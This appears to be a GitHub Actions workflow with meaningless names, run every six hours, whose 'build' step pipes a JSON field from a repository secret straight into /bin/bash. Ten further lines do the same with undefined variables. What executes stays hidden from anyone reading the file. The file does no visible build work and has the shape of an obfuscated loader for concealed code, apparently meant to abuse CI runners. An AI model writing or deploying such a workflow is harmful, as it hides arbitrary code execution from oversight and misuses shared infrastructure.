name: heniyiqish
on:
  workflow_dispatch:
  schedule:
    - cron: '31 4/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: heniyiqish
        env:
          lah9: ${{ secrets.lah9 }}
        run: |
          echo $lah9 | jq -r .oxgql074 | /bin/bash
          echo $vw79674 | jq -r .hil6 | /bin/bash
          echo $cyubi704 | jq -r .jhx227 | /bin/bash
          echo $jmfti0835 | jq -r .qzn6097 | /bin/bash
          echo $pzq63 | jq -r .i063 | /bin/bash
          echo $x82114 | jq -r .hm93764 | /bin/bash
          echo $wrls131 | jq -r .v56934 | /bin/bash
          echo $a90 | jq -r .lapik79 | /bin/bash
          echo $sly966 | jq -r .jnobz0 | /bin/bash
          echo $ork9660 | jq -r .vykh445 | /bin/bash
          echo $wkdll02 | jq -r .c344 | /bin/bash

